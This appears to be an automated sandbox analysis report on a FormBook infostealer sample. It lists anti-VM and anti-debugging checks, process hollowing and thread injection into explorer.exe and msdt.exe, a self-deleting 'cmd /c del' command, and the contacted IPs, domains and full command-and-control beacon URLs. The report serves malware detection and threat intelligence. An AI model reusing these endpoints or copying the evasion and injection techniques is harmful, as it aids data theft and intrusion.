Source: C:\Windows\explorer.exe TID: 2908 Thread sleep time: -50000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\ejecutable1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Thread delayed: delay time: 45730 Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.408183204.00000000002C7000.00000004.00000020.sdmp Binary or memory string: @z.SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Z
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.413682610.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000003.00000000.463438478.00000000044E7000.00000004.00000001.sdmp Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000003.00000000.408138486.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000003.00000000.413770462.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: ejecutable1.exe, 00000000.00000002.406398174.0000000002431000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_004088C0 rdtsc 2_2_004088C0
Enables debug privileges
Source: C:\Users\user\Desktop\ejecutable1.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_008A26F8 mov eax, dword ptr fs:[00000030h] 2_2_008A26F8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 4_2_025A26F8 mov eax, dword ptr fs:[00000030h] 4_2_025A26F8
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\ejecutable1.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\ejecutable1.exe Code function: 2_2_00409B30 LdrLoadDll, 2_2_00409B30
Source: C:\Users\user\Desktop\ejecutable1.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.dunedinhyperlocal.com
Source: C:\Windows\explorer.exe Domain query: www.multicoininvestment.com
Source: C:\Windows\explorer.exe Domain query: www.wwiilive.com
Source: C:\Windows\explorer.exe Domain query: www.institutosamar.com
Source: C:\Windows\explorer.exe Domain query: www.petersonmovingco.com
Source: C:\Windows\explorer.exe Domain query: www.quinnwebster.top
Source: C:\Windows\explorer.exe Domain query: www.lianxiwan.xyz
Source: C:\Windows\explorer.exe Domain query: www.oinfoproduto.com
Source: C:\Windows\explorer.exe Domain query: www.theseattlenotary.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\ejecutable1.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: BE0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ejecutable1.exe Memory written: C:\Users\user\Desktop\ejecutable1.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable1.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ejecutable1.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ejecutable1.exe Process created: C:\Users\user\Desktop\ejecutable1.exe C:\Users\user\Desktop\ejecutable1.exe Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable1.exe' Jump to behavior
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.423954079.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000003.00000000.408406807.0000000000750000.00000002.00020000.sdmp, msdt.exe, 00000004.00000002.667262580.0000000000CE0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ejecutable1.exe Queries volume information: C:\Users\user\Desktop\ejecutable1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ejecutable1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000002.00000002.442155573.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.422839452.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666143721.0000000000100000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.442236058.0000000000360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.407439949.0000000003431000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666244346.00000000002B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.666299275.00000000002E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.433550854.0000000007F73000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491544 Sample: ejecutable1.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 32 www.lianxiwan.xyz 2->32 34 www.area-arquitectos.com 2->34 40 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 6 other signatures 2->46 10 ejecutable1.exe 1 5 2->10         started        signatures3 process4 signatures5 58 Tries to detect virtualization through RDTSC time measurements 10->58 60 Injects a PE file into a foreign processes 10->60 13 ejecutable1.exe 10->13         started        process6 signatures7 62 Modifies the context of a thread in another process (thread injection) 13->62 64 Maps a DLL or memory area into another process 13->64 66 Sample uses process hollowing technique 13->66 68 Queues an APC in another process (thread injection) 13->68 16 explorer.exe 13->16 injected process8 dnsIp9 26 oinfoproduto.com 216.172.172.208, 49167, 80 UNIFIEDLAYER-AS-1US United States 16->26 28 www.lianxiwan.xyz 101.35.124.222, 80 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 16->28 30 13 other IPs or domains 16->30 36 System process connects to network (likely due to code injection or exploit) 16->36 38 Performs DNS queries to domains with low reputation 16->38 20 msdt.exe 16->20         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 20->48 50 Modifies the context of a thread in another process (thread injection) 20->50 52 Maps a DLL or memory area into another process 20->52 54 Tries to detect virtualization through RDTSC time measurements 20->54 23 cmd.exe 20->23         started        process13 signatures14 56 Deletes itself after installation 23->56
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
101.35.124.222
 www.lianxiwan.xyz China
132203 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN false
162.251.85.174
 quinnwebster.top United States
394695 PUBLIC-DOMAIN-REGISTRYUS false
162.0.229.241
 multicoininvestment.com Canada
22612 NAMECHEAP-NETUS false
216.239.32.21
 www.petersonmovingco.com United States
15169 GOOGLEUS false
34.102.136.180
 wwiilive.com United States
15169 GOOGLEUS false
184.168.131.241
 dunedinhyperlocal.com United States
26496 AS-26496-GO-DADDY-COM-LLCUS false
162.0.232.162
 theseattlenotary.com Canada
22612 NAMECHEAP-NETUS false
216.172.172.208
 oinfoproduto.com United States
46606 UNIFIEDLAYER-AS-1US false

Contacted Domains

Name IP Active
theseattlenotary.com 162.0.232.162 true
www.petersonmovingco.com 216.239.32.21 true
oinfoproduto.com 216.172.172.208 true
www.area-arquitectos.com 93.185.100.223 true
dunedinhyperlocal.com 184.168.131.241 true
quinnwebster.top 162.251.85.174 true
www.lianxiwan.xyz 101.35.124.222 true
wwiilive.com 34.102.136.180 true
multicoininvestment.com 162.0.229.241 true
www.dunedinhyperlocal.com unknown unknown
www.multicoininvestment.com unknown unknown
www.wwiilive.com unknown unknown
www.institutosamar.com unknown unknown
www.quinnwebster.top unknown unknown
www.oinfoproduto.com unknown unknown
www.theseattlenotary.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.quinnwebster.top/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=X52t7rVeaYGOvGTdnQUffRZcqF2Cx7WZGoYk6rC/HKvqONPbs0ItwbG7EjAhog3TNS4z+A== false
  • Avira URL Cloud: safe
 unknown
http://www.oinfoproduto.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=iGR+5Iun3qB2MqfdIYMGDL0AT8nSBE6bMfK6r+1aL2UXxRazRBC9SoS0x9BZPXZuDFcMhw== false
  • Avira URL Cloud: safe
 unknown
http://www.theseattlenotary.com/u4an/?1bxhyLu=VfCS01mkQGOjQhDskfurykOlS3JM86bPzWlU8yjKrYpz8teuAGkOmvtPa8vVPydcTYndOQ==&a8a=O6e4vnipWHrd6Lz true
  • Avira URL Cloud: safe
 unknown
http://www.petersonmovingco.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=1NdkLOHGjYgchrzbDiWeYorfFjsi8IQ9moMk+khmjZ8HoIOkAHeJOPevVb4lI15O4YwMeA== false
  • Avira URL Cloud: safe
 unknown
http://www.wwiilive.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=2wrG/oaPoZN58JamjsocLLaSsZCLAXvYnHaXxYH/bF19vnAo7muls9VTY9bzjfrYRlsEFw== false
  • Avira URL Cloud: safe
 unknown
http://www.multicoininvestment.com/u4an/?a8a=O6e4vnipWHrd6Lz&1bxhyLu=IweMS5AD1Z8aBlnPYfnQfVfd8bpTLSXzmKGHl0Em7c4kxOia/Ddx83+xf6gfPzYK0colLA== false
  • Avira URL Cloud: safe
 unknown